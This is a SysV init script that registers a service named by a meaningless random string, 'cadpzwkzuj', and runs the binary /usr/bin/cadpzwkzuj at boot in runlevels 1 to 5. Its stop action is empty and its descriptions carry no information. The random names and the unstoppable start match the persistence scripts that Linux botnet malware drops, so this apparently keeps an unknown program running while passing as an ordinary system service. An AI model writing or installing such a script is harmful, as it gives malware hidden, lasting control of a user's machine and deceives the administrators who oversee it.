#!/bin/sh
# chkconfig: 12345 90 90
# description: cadpzwkzuj
### BEGIN INIT INFO
# Provides:		cadpzwkzuj
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	cadpzwkzuj
### END INIT INFO
case $1 in
start)
	/usr/bin/cadpzwkzuj
	;;
stop)
	;;
*)
	/usr/bin/cadpzwkzuj
	;;
esac
